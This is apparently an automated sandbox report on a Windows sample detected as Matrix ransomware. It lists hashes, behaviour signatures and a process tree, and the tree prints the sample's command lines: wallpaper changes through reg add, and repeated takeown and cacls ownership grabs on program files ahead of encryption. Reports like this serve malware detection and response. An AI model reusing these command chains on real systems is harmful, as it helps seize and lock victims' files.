Analysis
-
max time kernel
597s -
max time network
360s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
30-12-2023 16:29
General
-
Target
095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
-
Size
6.5MB
-
MD5
1a699d18fc42426c1fdfe7ad01a42d20
-
SHA1
f8b0d7c0019f48ffb8f6d0f0634104751cc5842f
-
SHA256
095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270
-
SHA512
b6c0abad59318341f2ce0c9057df1d3dfe6421da36519b15927bbe769807ca007761bc47a64e69513ddb9d9cd02f8f2df6bce755a5c26adfadacd62da08ba253
-
SSDEEP
196608:ugY5Wpp0209r4M3jtxMTdLZ4jSonnP6TH3DwGP:Y5Wp0202A/ConuP
Score
10/10
Malware Config
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 41 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops desktop.ini file(s) 41 IoCs
-
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe"C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe" "C:\Users\Admin\AppData\Local\Temp\NWgD7cfQ.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\NWgD7cfQ.exe"C:\Users\Admin\AppData\Local\Temp\NWgD7cfQ.exe" -n2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rqDVafGM.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rqDVafGM.bmp" /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui" /E /G Admin:F /C4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\uxBbuLmF.vbs"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui""2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "add_reviewer.gif" -nobanner4⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "add_reviewer.gif" -nobanner5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1258.TXT" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "background.png" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "forms_distributed.gif" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "pdf.gif" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "pdf.gif" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ROMAN.TXT" -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "tr.gif" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1251.TXT" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner5⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui"5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui" /E /G Admin:F /C5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C4⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui"4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui""2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "license.html" -nobanner4⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner5⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"5⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C5⤵
-
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ChessMCE.png" -nobanner4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "adobepdf.xdc" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "eng32.clx" -nobanner4⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "zy______.pfm" -nobanner4⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ROMANIAN.TXT" -nobanner5⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"5⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C5⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Identity-H" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C4⤵
- Suspicious use of WriteProcessMemory
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "can.fca" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "blank.jtp" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "main.css" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵
- Loads dropped DLL
-
-
